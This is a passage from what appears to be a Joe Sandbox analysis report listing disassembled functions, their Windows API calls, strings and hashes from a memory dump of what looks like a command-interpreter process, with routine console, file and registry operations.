                                                                      • Opcode Fuzzy Hash: db81adf32ff9168bc4a9a5f2d9a8af2b4e01df434221d833e00ca547538d24f8
                                                                      • Instruction Fuzzy Hash: 77711AB4F0070697DB249F28CC8566E73B1EB80300F18807ADC4AA7385EB799D46CB99
                                                                      Function 00045020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045074
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0004515F
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • iswspace.MSVCRT ref: 00059289
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswspacememset
                                                                      • String ID: %s
                                                                      • API String ID: 2220997661-3043279178
                                                                      • Opcode ID: 6a0d7b0da57243f8d759248b5dba44cf853e80ef0ea783a75c02690d23c1afa5
                                                                      • Instruction ID: c5229a3a76b8db2f4cde66da85b61dd07325b0aa080dfef28f41c53452724f47
                                                                      • Opcode Fuzzy Hash: 6a0d7b0da57243f8d759248b5dba44cf853e80ef0ea783a75c02690d23c1afa5
                                                                      • Instruction Fuzzy Hash: 4D51D0B5E00612ABDB249BA8DC426BFB3F5EF58311F14446DEC4AE7241EB349E41CB94
                                                                      Function 000670D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00067121
                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00067197
                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000671FF
                                                                      Strings
                                                                      • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 000670EE
                                                                      • %WINDOWS_COPYRIGHT%, xrefs: 00067107
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                      • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                      • API String ID: 1103618819-4062316587
                                                                      • Opcode ID: dc2868ae94fad8092e4811348b586491ad7c6a36875af9a62ff7a9762a98e2f6
                                                                      • Instruction ID: 50dd0ed8b446a8c474873f0215ac679a32b785039baa1e1bd4647ed68a23af4c
                                                                      • Opcode Fuzzy Hash: dc2868ae94fad8092e4811348b586491ad7c6a36875af9a62ff7a9762a98e2f6
                                                                      • Instruction Fuzzy Hash: E341D535B0021587DF60DBA888507BA73E2BF49758F68006AE949EF350EA659E42C350
                                                                      Function 00062584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00062652
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00062670
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00062694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateSemaphore
                                                                      • String ID: _p0$wil
                                                                      • API String ID: 4049970386-1814513734
                                                                      • Opcode ID: 0ded961c01e97894c50ba5055fe7a88aecac663fa30a44c021f8043dc2eefd4c
                                                                      • Instruction ID: ad4e60b12726115461581890c2b2cc07d945ee250720f9d63e0627e31a0e9b4a
                                                                      • Opcode Fuzzy Hash: 0ded961c01e97894c50ba5055fe7a88aecac663fa30a44c021f8043dc2eefd4c
                                                                      • Instruction Fuzzy Hash: 7931E071B40A1A8BDB25DF28CD98AEA73F6FF94300F1441A8F80697290DE74DE408B60
                                                                      Function 000651E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcsnicmp.MSVCRT ref: 00065295
                                                                        • Part of subcall function 0005727B: __iob_func.MSVCRT ref: 00057280
                                                                      • fprintf.MSVCRT ref: 00065215
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: __iob_func_wcsnicmpfprintf
                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                      • API String ID: 1828771275-2781220306
                                                                      • Opcode ID: e359239bfd4f3b43664b986293ca6608bfce9316f0cb00e24295bd3ede1bb4d1
                                                                      • Instruction ID: 401c97e53b13b8d9cd80d2e2b1fa0465afdd72c01108e916ad2cd707a6354f40
                                                                      • Opcode Fuzzy Hash: e359239bfd4f3b43664b986293ca6608bfce9316f0cb00e24295bd3ede1bb4d1
                                                                      • Instruction Fuzzy Hash: 51315D32F00A139BDB78AB689C55AAE73A2EF55701F140539EC0AA3241EB705E01C699
                                                                      Function 00044D42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00044D66
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00044D8A
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00044D95
                                                                      Strings
                                                                      • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00044D5C
                                                                      • UBR, xrefs: 00044D82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                      • API String ID: 3677997916-3870813718
                                                                      • Opcode ID: 10714081b4f2e024f6962a33a6b79ed0e7e7b0085d3756bfbaca4060bc44ce93
                                                                      • Instruction ID: f4964c1fbd1d42655cc0c059ad17ed0eb6456c670058e3c03f82efd0e1bd219f
                                                                      • Opcode Fuzzy Hash: 10714081b4f2e024f6962a33a6b79ed0e7e7b0085d3756bfbaca4060bc44ce93
                                                                      • Instruction Fuzzy Hash: EC011DB2E40218BBEB619B94DC45FDEBBB8EB84750F100176EA01B6140D2709A41DB58
                                                                      Function 0004FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0004FD3A
                                                                      • wcsspn.MSVCRT ref: 0004FF18
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00052229,00000000,-00000105,?,00000000,00000000), ref: 0005000F
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                        • Part of subcall function 00051CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                      • String ID:
                                                                      • API String ID: 1535828850-0
                                                                      • Opcode ID: 15cfb970c28a7fd6388ae82e16055cc7db6ecc87af0b6582b5428c50f29e3c25
                                                                      • Instruction ID: e0eeaa057670f80a72eff465a5332d1ee3f1db596b61c24d20d5f951e61e796f
                                                                      • Opcode Fuzzy Hash: 15cfb970c28a7fd6388ae82e16055cc7db6ecc87af0b6582b5428c50f29e3c25
                                                                      • Instruction Fuzzy Hash: 64C1A171A00215CFDB68DF18C890BAAB7F6FF48305F5441AED84A9B291EB359E85CF44
                                                                      Function 00045190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_setjmp3
                                                                      • String ID:
                                                                      • API String ID: 4215035025-0
                                                                      • Opcode ID: 2fac4867f9a9170a97f8175b4a683333f6a14338d5d87be0c0ab9b92dae7ebcd
                                                                      • Instruction ID: 7ef8121fdc320917e6a7a60dce21921aaadcd8ff816071336536f64a3f09b7bf
                                                                      • Opcode Fuzzy Hash: 2fac4867f9a9170a97f8175b4a683333f6a14338d5d87be0c0ab9b92dae7ebcd
                                                                      • Instruction Fuzzy Hash: AB51B5B1E01628DBDB64CF55DC94AEEBBB4FB44341F1400AAEA09A3142DB349F84CF65
                                                                      Function 000695F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00069631
                                                                      • memset.MSVCRT ref: 0006964F
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • _wcsicmp.MSVCRT ref: 000696FD
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 0006971B
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00069733
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_wcsicmp
                                                                      • String ID:
                                                                      • API String ID: 1670951261-0
                                                                      • Opcode ID: ea002562e5bb3a57c1babfe5206204b36826c41968aadf6a0251cc69efbf77a4
                                                                      • Instruction ID: 0248cc1dad35b42231ea355d0a56aa49e38b669869f0b5f016d6722cc2704112
                                                                      • Opcode Fuzzy Hash: ea002562e5bb3a57c1babfe5206204b36826c41968aadf6a0251cc69efbf77a4
                                                                      • Instruction Fuzzy Hash: 0B417171A102195BEF24CBA5DC95BEEB7B9EF04355F0400A9E905E3141DB38DF84CB61
                                                                      Function 000694E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00069527
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006952F
                                                                      • _get_osfhandle.MSVCRT ref: 000695B5
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000695BD
                                                                        • Part of subcall function 00068C50: longjmp.MSVCRT(00080A70,00000001,0004206C,00045E68,?,?,?,?,00000000), ref: 00068CC4
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D1D
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D45
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D6D
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000695CC
                                                                        • Part of subcall function 0004A16C: _close.MSVCRT ref: 0004A19B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                      • String ID:
                                                                      • API String ID: 288106245-0
                                                                      • Opcode ID: 83656703cb7b7da12822c9d1234d2ad2a7e245016b135926cbb7a628dbe82653
                                                                      • Instruction ID: 7f54ba1992e691708ced9b0fff977111428e0a1278fd4536f63e0ca9a2a2b305
                                                                      • Opcode Fuzzy Hash: 83656703cb7b7da12822c9d1234d2ad2a7e245016b135926cbb7a628dbe82653
                                                                      • Instruction Fuzzy Hash: EE31C171A00604AFEF299F74D849BAE77AEEB84321F20812AF503D6181DB78DD418B50
                                                                      Function 0005260E Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 00052650
                                                                      • _get_osfhandle.MSVCRT ref: 0005F339
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 0005F347
                                                                      • longjmp.MSVCRT(00080A30,00000001,?,00000104,00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 0005F383
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,000587F0,?,?,?,000587F0,00000000,?,00044A0A), ref: 0005F390
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                      • String ID:
                                                                      • API String ID: 158340877-0
                                                                      • Opcode ID: f14ab33357cc5534bcc42f6f515b362e3e6797cbd610d5d94eaf9a01a0f6f070
                                                                      • Instruction ID: ebf0a587a6818e1b743b5a06432e4b5b0f2136f047ca5220a684c56a08cf3c56
                                                                      • Opcode Fuzzy Hash: f14ab33357cc5534bcc42f6f515b362e3e6797cbd610d5d94eaf9a01a0f6f070
                                                                      • Instruction Fuzzy Hash: C8318D71A003069BEB24AF74D885ABFB7E8EF44712B10483EE886D2551EB79D909CB50
                                                                      Function 00054CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00054CC2
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00068FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00054CCA
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00060BFC
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00060C48
                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00060C71
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 3588551418-0
                                                                      • Opcode ID: 27ca6216c06445e3170448b49e845b81018189019bc4fbda4b49aff3cc95a93e
                                                                      • Instruction ID: 7d7e0c808102398d3d826d4e8ced757536ad5994e05a9267f1339e465e8a5ef6
                                                                      • Opcode Fuzzy Hash: 27ca6216c06445e3170448b49e845b81018189019bc4fbda4b49aff3cc95a93e
                                                                      • Instruction Fuzzy Hash: 8431D471B00105AFEB689F64D8459BF77AAFF85319B20843AE806D3251DB39DD84CB61
                                                                      Function 0004E272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004E29B
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004E2A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 1013686580-0
                                                                      • Opcode ID: 92efd195c76c5acb24c6dedcdc8c915cc79ddfc7c192a383fb0c0366a1dc5a8f
                                                                      • Instruction ID: 5457c6e0f306a29ffec647b01024226a0f31a5c88097dd29921b86fec1c9736f
                                                                      • Opcode Fuzzy Hash: 92efd195c76c5acb24c6dedcdc8c915cc79ddfc7c192a383fb0c0366a1dc5a8f
                                                                      • Instruction Fuzzy Hash: EB11E331204601EFF2342764EC4AB5A3B96FB45722F30052BF509961E1DB799884CB55
                                                                      Function 00068550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00068571
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0006857E
                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 000685C7
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 000685D5
                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 000685DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 3008996577-0
                                                                      • Opcode ID: aa301f0adfc0374bd9919a21c9c09362480d10f21aefe714e526a66e0c5b901f
                                                                      • Instruction ID: 42015e01cf3e446c05c4373c2ba750c09a594273fa998136813cbba02628103a
                                                                      • Opcode Fuzzy Hash: aa301f0adfc0374bd9919a21c9c09362480d10f21aefe714e526a66e0c5b901f
                                                                      • Instruction Fuzzy Hash: 96113075A002099ADF05DFF4DC09AEEB7B9AF0D710F10452AE515E7290EB348A45CB69
                                                                      Function 000570F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00057122
                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00057131
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0005713A
                                                                      • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00057143
                                                                      • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00057158
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: c8cd65398425fb8b13754b03e0d19ebd367dd8fe6a63eac48f185a69c6d9f9f6
                                                                      • Instruction ID: 2bdfff0c03ae680ff7130ddad86e48121fac256da9e1766f93f90ec2b5918288
                                                                      • Opcode Fuzzy Hash: c8cd65398425fb8b13754b03e0d19ebd367dd8fe6a63eac48f185a69c6d9f9f6
                                                                      • Instruction Fuzzy Hash: 5D114C75E05208EBEF10DBB8E94869EB7F5FF48311F510856D801E7260E7799B449B42
                                                                      Function 00064840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
